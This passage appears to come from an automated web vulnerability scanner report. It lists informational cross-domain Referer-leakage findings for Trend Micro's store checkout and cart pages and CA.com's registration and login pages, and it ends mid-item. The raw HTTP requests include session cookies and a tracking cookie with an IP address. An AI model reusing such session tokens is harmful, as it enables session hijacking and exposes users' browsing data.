The page was loaded from a URL containing a query string:https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US The response contains the following links to other domains:https://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/cartheadblack_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1780400&StyleVersion=42&styleIncludeFile=style.css https://drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_mc_en_US.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_paypal_logo.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif https://drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en
Request
GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=24051346139,0) Date: Tue, 06 Sep 2011 18:21:15 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app96 Content-Length: 56184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <meta name="author" content="Trend Micro Global Web Development MUC ;-)"><link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> <meta name="" content="">...[SNIP]... <!--!/esi:include --><link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1780400&StyleVersion=42&styleIncludeFile=style.css" type="text/css" media="all" /> <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAno...[SNIP]... <!-- begin site specific javascript --><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... </style><script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"> </script>...[SNIP]... <a href="http://store.trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"> </a>...[SNIP]... <div id="dr_verisign" title="This site chose VeriSign SSL for secure e-commerce and confidential communications."> <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en> </script>...[SNIP]... <!--Checkout--> <img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/cartheadblack_b.gif" height="27" alt="shopping cart" /> <div class="bcBlack">...[SNIP]... <div id="dr_ExpandPaymentDetailsPayPalExpress"> <img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_paypal_logo.gif" border="0" align="left" valign="middle" id="dr_paypalExpressImage"> Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address. </div>...[SNIP]... <p><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards" border="0"/> </p>...[SNIP]... <div id="postProc" style="visibility:hidden;margin-top:-30px;"> <img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" /> </div>...[SNIP]... <a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/> </a>...[SNIP]... <a href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"> </a>...[SNIP]... <a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/> </a>...[SNIP]... </script><script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> </script>...[SNIP]... <!-- ####################################### --> <script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
12.7. https://store.trendmicro.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/store
Issue detail
The page was loaded from a URL containing a query string:https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage The response contains the following links to other domains:https://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/30DayMBSG-CMYK-Burst_sm2.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/carthead_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/cartPaymentOptions3.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/pb/images/siteOpt/cdimg.png https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1876500&StyleVersion=55&styleIncludeFile=style.css https://drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg https://drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif https://drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif https://drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/add2.jpg https://drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif https://drh2.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/pixel.gif https://drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif https://drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/sc_continueshopping_en_US.gif https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0
Request
GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360405795,0) Date: Tue, 06 Sep 2011 18:15:31 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app96 Content-Length: 95454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <meta name="author" content="Trend Micro Global Web Development MUC ;-)"><link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> <meta name="X-Imperia-Live-Info" content="434533e2-78c9-5cfe-f9ed-c2bcbc0c2e76/1/6/4147">...[SNIP]... <!--!/esi:include --><link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1876500&StyleVersion=55&styleIncludeFile=style.css" type="text/css" media="all" /> <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1876500&StyleVersion=55&ceid=177147900&cename=TopHeader&id=ShoppingCartPage"-...[SNIP]... <!-- begin site specific javascript --><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... <!-- Begin Hiconversion Head Enabling. Do NOT move. Must come directly before the closing head tag --> <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'> </script>...[SNIP]... <a href="http://store.trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"> </a> </div> <div id="dr_verisign"> <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... <!--Checkout--> <img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/carthead_b.gif" height="27" alt="shopping cart" /> <div class="bcGrey">...[SNIP]... <div id="dr_moneyBackGuarantee"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/30DayMBSG-CMYK-Burst_sm2.gif" /> </div>...[SNIP]... <div id="dr_cartProdImage" style="float:left;"> <img alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/> </div>...[SNIP]... <div id="dr_cartProdImage" style="float:left;"> <img alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/> </div>...[SNIP]... <a href="/DRHM/store?Action=DisplayBackUpCDInformationPage&SiteID=tmamer&Locale=en_US&Env=BASE" onclick="popUp(this.href,'BackupCD',410,360);return false;" target="_blank"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/pb/images/siteOpt/cdimg.png" border="0" class="backupcdimage" /> <span class="dr_blueOfferHeader">...[SNIP]... <a href="/DRHM/store?Action=AddItemToRequisition&SiteID=tmamer&Locale=en_US&Env=BASE&productID=8350200&productDataID=1934000000" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/add2.jpg" border="0" name="Add_8350200" /> </a>...[SNIP]... <td class="paymentimages"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/cartPaymentOptions3.gif" alt="Visa, Master Card, Discover, American Express, Diner's Club International, JCB, PayPal, Wire Transfer" /> </td>...[SNIP]... <div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/> </div>...[SNIP]... <a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /> </a>...[SNIP]... <div> <img class="dr_cart_details_overlay_boxshot" align="left" alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/> <div class="dr_cart_details_overlay_description">...[SNIP]... <div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/> </div>...[SNIP]... <a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /> </a>...[SNIP]... <div> <img class="dr_cart_details_overlay_boxshot" align="left" alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/> <div class="dr_cart_details_overlay_description">...[SNIP]... <div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/> </div>...[SNIP]... <a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /> </a>...[SNIP]... <div> <img class="dr_cart_details_overlay_boxshot" align="left" alt="Extended Download Service" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/pixel.gif" border="0"/> <div class="dr_cart_details_overlay_description">...[SNIP]... <a href="javascript:checkSN();" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" onClick="javascript:processPage();q=false;" alt="Continue" /> </a>...[SNIP]... <div id="postProc" style="visibility:hidden;margin-top:-30px;"> <img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" /> </div>...[SNIP]... <a href="/DRHM/store?Action=ContinueShopping&SiteID=tmamer&Locale=en_US&Env=BASE" onClick="q=false"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/sc_continueshopping_en_US.gif" /> </a>...[SNIP]... <a href="javascript:checkSN();" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /> </a>...[SNIP]... <a href="javascript:checkSN();" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /> </a>...[SNIP]... <a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/> </a>...[SNIP]... <a href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"> </a>...[SNIP]... <a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/> </a>...[SNIP]... </script><script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> </script>...[SNIP]... <!-- ####################################### --> <script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
12.8. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The page was loaded from a URL containing a query string:https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx The response contains the following links to other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:25:47 GMT Content-Length: 458334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <scri...[SNIP]... <link href="/css/AutoComplete.css" rel="stylesheet" type="text/css" media="screen" />--><link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/> <link href="/css/base.css" rel="stylesheet" type="text/css" media="screen"/>...[SNIP]... <link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
12.9. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page was loaded from a URL containing a query string:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 The response contains the following links to other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css https://secure.addthis.com/js/250/addthis_widget.js
Request
